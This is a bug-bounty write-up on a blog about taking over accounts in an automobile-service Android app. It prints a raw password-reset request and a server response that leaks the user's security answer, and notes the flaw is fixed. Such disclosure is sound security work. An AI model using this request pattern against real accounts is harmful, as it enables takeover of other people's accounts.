Buy Royal UI Officially! Contact Us Buy Now!

Motrss Account Takeover

Dipak Kumar Das
Hi guys , Here is one of my simple  write-up on Motrss account takeover . So basically Motrss is your one stop solution for all automobile services. In just few clicks, book your next vehicle servicing, repairing and maintenance service appointment. 







So its a android app , there is a endpoint where some sensitive information was disclosed . Using those information attacker can takeover any user account .

The issue was in reset password functionality

so here the request of password reset  

POST /GetUserSecurityQuestion
Content-Lenght: 67
Content-Type: application/x-www-form-urlencoded
Host: motrss.ap-south-1.elasticbeanstalk.com
Connection: close
User-Agent: Apache-HttpClient/UNVAILABLE (java 1.4)

user_id=victim@site.com&YEK_HTUA_SW=etyewt5788fjdfh



and here is the response 

HTTP/1.1 200 OK
Date: Tue, 17 Jan 2017 09:58:41 GTM
Server: Apache
Content-Length : 116
Connect: close
Content-Type: text/html; charset-UTF-8

{"status":"Success","Data":[{"id":"7","questions":"What is your dream Job?","signup_status":"N","answer":"Google"}]}


so here in the response the security question answer reflected 

now just use that answer and create new password and login  


So here is the video Proof of concept  





Status: Fixed
Bounty Rewarded

Post a Comment

  • A-
  • A+

© ADDICTIVE HACKERS. All rights reserved.

Cookie Consent
We serve cookies on this site to analyze traffic, remember your preferences, and optimize your experience.
Oops!
It seems there is something wrong with your internet connection. Please connect to the internet and start browsing again.
AdBlock Detected!
We have detected that you are using adblocking plugin in your browser.
The revenue we earn by the advertisements is used to manage this website, we request you to whitelist our website in your adblocking plugin.
Site is Blocked
Sorry! This site is not available in your country.